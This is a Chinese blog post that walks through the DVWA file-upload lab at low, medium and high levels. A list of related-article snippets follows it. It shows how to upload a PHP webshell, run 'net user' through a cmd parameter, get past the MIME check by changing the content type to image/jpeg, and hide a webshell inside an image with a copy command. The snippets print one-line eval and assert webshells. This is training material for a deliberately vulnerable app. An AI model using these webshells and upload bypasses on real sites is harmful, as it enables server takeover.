DVWA之文件上传

最新推荐文章于 2024-04-24 10:48:01 发布
最新推荐文章于 2024-04-24 10:48:01 发布
阅读量1.2k 收藏 5
点赞数 1
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44105778/article/details/88372331
版权

在这里插入图片描述

一、尝试low等级

我们上传一个phpinfo.php文件,文件内容为<?php echo pphpinfo()?>,
在这里插入图片描述
把路径拼接起来,输入

http://localhost/DVWA/hackable/uploads/phpinfo.php

成功获得执行我们上传的文件
在这里插入图片描述
我们再上传个一句话木马文件
然后直接尝试系统命令

http://localhost/DVWA/hackable/uploads/cmd.php
?cmd=system('net user');

在这里插入图片描述

二、尝试medium等级

上传一句话木马文件,发现报错,只支持jpeg和png格式的图片
在这里插入图片描述
那么我们抓包看看,上传成功和上传不成功的包有什么差别,然后就是不断的尝试,不端地把上传不成功的包与上传成功的不同之处改成和上传成功的包相同,然后重新发送,发现了破解的办法
上传cmd.php文件,然后把文件类型改为imag/jpeg,重新发送就可以了。
在这里插入图片描述
三、high等级
前面的方法都不能用了。尝试了文件后缀名和文件内容发现都失败了
在这里插入图片描述
那么我们就想到了”制作内涵图“,就是把文件和图片合并成一张图片
在cmd窗口下用命令结合

copy 1.jpg/b  +1.txt/a  2.jpg

结合成2.jpg
我们用编辑器打开,在文件末尾发现了我们的一句话木马
在这里插入图片描述

那既然传上去了,那么我们要怎么用呢
首先我们需要切换下服务器,切换成nginx
在这里插入图片描述
在phpini配置文件里把下面这个参数改为一,默认是1
在这里插入图片描述
然后输入http://localhost/DVWA//hackable/uploads/2.jpg/2.php即可上传
在这里插入图片描述

giunwr
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA文件上传漏洞
HoYim
03-27 775
文件上传漏洞 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 1 Webshell简介 WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称之为一种网页后门。攻击者在入侵了一个网站后,通常会将这些asp或php后门文件与网站服务器web目录下正常的网页文件混在一起,...
DVWA-文件上传
Darklord.W
04-09 675
低中高步骤截图及说明 低: 未做任何过滤,可以上传一句话并用菜刀连接 然后,记得一句话木马中POST要完全大写 终于,不是很愉快的连接到了目标主机 中: 中等级限制了文件类型和文件大小 可以burpsuite抓包更改类型 在进行菜刀连接 高: 限制了文件后缀名,限制了文件大小,以及函数会通过读取文件头,返回图片的长、宽等信息,如果没有相关...
DVWA-文件上传与文件包含
qq_60848021的博客
06-23 3038
1,代码分析: 从以上代码可以看出并没有做任何限制,先用最简单的PHP一句话代码试下: 使用中国蚁剑进行连接 扩展:使用中国蚁剑连接出现以下情况是路径地址错误 出现”返回数据为空“,是代码有错误;basename()函数:返回带有文件扩展名的文件名部分。例如:/xx/test.php,返回test.php代码分析:继续上传yjh.php,使用BP进行抓包,更改文件类型扩展:[$_FILES’userfile’][‘name’]客户端机器文件的原名称。[$_FILES’userfile’][‘type
DVWA文件上传漏洞
m0_61851859的博客
02-05 350
(1)通过$_FILES预定义变量获取上传文件的文件名(name)、文件类型(type)和文件大小(size)这是三个数据分别赋给三个变量$uploaded_name、$uploaded_type、$uploaded_size。(3)因此,medium级别主要是判断文件的类别和大小,代码中对于文件大小的限制一般文件都可以满足要求,因此主要分析文件上传的类型。(8)综上,low级别对上传的文件类型没有任何防范,其初衷是想要用户只能上传图片,而现在可以上传php文件,而且能够被网站解析。
文件上传与包含漏洞综合利用】DVWA-文件上传-难度:High
最新发布
Mr_Fmnwon的博客
04-24 1139
一方面,(任意)文件上传漏洞指的是上传非预期的文件格式(如php文件)到目标服务器,而通过其他方式(直连、包含等)进行执行来进一步利用。另一方面,利用文件包含漏洞,能够把静态文件中的php代码通过回显转发的方式进行包含执行。过程中遇到很多问题:1.high的包含漏洞保护措施没有关注 2.一些jpeg/png图片被解析时,自身的一些字符会被错误识别为php代码,而往往会导致语法错误,通过copy到最后的。可以推测,检查是否为JPEG/PNG图,是依靠文件的后缀、文件头字段信息来进行双重检测的。
DVWA 文件包含及上传漏洞
Starr
03-07 2101
文章目录1. DVWA File InclusionLow levelMedium levelHigh levelImpossible level2. DVWA File uploadLow levelMedium levelHigh levelImpossible Level 1. DVWA File Inclusion Low level url路径: /dvwa/vulnerabilities/fi/index.php?page=include.php 可以看出page参数对应的php会被包含,尝试
DVWA靶场-文件上传漏洞
zeroone的博客
03-08 1万+
第五关:File upload(文件上传)       文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。 Low <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to
kali2021.3安装dvwa靶场
02-24
接着,通过文件传输工具将该文件夹上传到Kali虚拟机的/home/kali/Desktop目录下。 在Kali虚拟机内部,需要进行一系列的步骤来配置和启动DVWA。首先切换到桌面目录,然后使用`sudo cp -r`命令复制dvwa目录到/var/...
文件上传之upload-labs(一)
01-08
文件上传漏洞详解】 文件上传漏洞是网络安全领域中常见的安全问题,它允许攻击者通过上传恶意文件(如木马、病毒或恶意脚本)来绕过服务器的安全检查,并执行任意代码。这种漏洞的存在可能导致服务器被控制,数据...
DVWA-master.zip
07-31
**文件上传漏洞**:DVWA中的文件上传漏洞是模拟了现实中Web应用中可能存在的危险情况。攻击者可以通过上传恶意文件,如脚本或可执行文件,来获取服务器的控制权。了解这类漏洞可以帮助我们理解如何验证用户上传的...
DVWA & File Upload文件上传最详细绕过
热门推荐
Hackpatrick的博客
08-04 2万+
DVWA的使用练习: 今天学习的内容很有意思,也很实用。 DVWA其实本质上就是一个脆弱系统,它需要的是php+mysql的环境,旨在为安全人员提供一个合法的环境用来测试自己的专业技能和工具,并且让web安全工作着深刻的理解漏洞防范和入侵的本质原理,很适合我们这种小白锻炼自己,好废话不多说。。。。。 首先DVWA环境安装: 在下载DVWA之前我们需要一个php+mysql的环境,apach...
DVWA通关--文件上传(File Upload)
箭雨镜屋
01-03 5089
LOW 通关路径 <?php assert($_POST['dvwa']);?> 源码分析 MEDIUM 通关路径 源码分析 HIGH 通关路径 sh.php和sh.jpeg都是返回这个 源码分析 IMPOSSIBLE 源码分析
DVWA [File Upload] [文件上传漏洞]
weixin_45253622的博客
05-20 696
目录 Low Medium High Impossible 漏洞防御 Low 源码: <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; //上传文件的路径 $target_path .= basename( $_FILES[
DVWA靶场之文件上传(三个等级)
m0_55854679的博客
05-02 9183
文件上传 文件上传的要点:(1)绕过题目的各种过滤手段成功上传文件并且不被删除; (2)确保文件可以正常运行; (3)确保文件可以执行命令。 一句话木马(简称Webshell) <?php @eval($_POST['cmd']); ?> 基本原理 利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过蚁剑或者中国菜刀即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST['cmd']表示从页面中获
DVWA之File Upload(文件上传漏洞)
追风筝的孩子
08-16 4273
      由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。       下面对不同级别的代码进行分析。 一:LOW 1、服务器端核心代码 &lt;?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we goin...
OWASPBWA的搭建及简单学习文件上传漏洞
小城的博客
11-08 3287
OWASPBWA的搭建及学习 我直接将我使用的OWASPBWA的链接地址发出来 owasp下载链接:https://jaist.dl.sourceforge.net/project/owaspbwa/1.2/OWASP_Broken_Web_Apps_VM_1.2.7z 将这个链接复制到迅雷下载即可,大概是1.7G,网速快的话很快就下好了。 下载完之后直接解压,然后点击vm右上角的文件直接选择打开这个文件夹即可使用 * * 进入机子后,输入ip a 查看机子的ip地址 得到靶机的地址后,我们可以在浏览器
DVWA系列之23 medium级别上传漏洞分析与利用
weixin_34090562的博客
01-06 87
下面再来分析medium级别的代码:这里分别通过“$_FILES['uploaded']['type']”和“$_FILES['uploaded']['size']”获取了上传文件的 MIME类型和文件大小。MIME类型用来设定某种扩展名文件的打开方式,当具有该扩展名的文件被访问时,浏览器会自动使用指定的应用程序来打开,如jpg图片的MIME为p_w_picpath/jpeg...
dvwa靶场文件上传
09-26
DVWA(网络安全综合靶场)中的文件上传功能存在漏洞。通过分析DVWA的源码,可以看到服务器对上传文件的类型和内容没有进行任何检查和过滤,导致明显的文件上传漏洞。攻击者可以上传任何文件,包括一句话木马,然后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值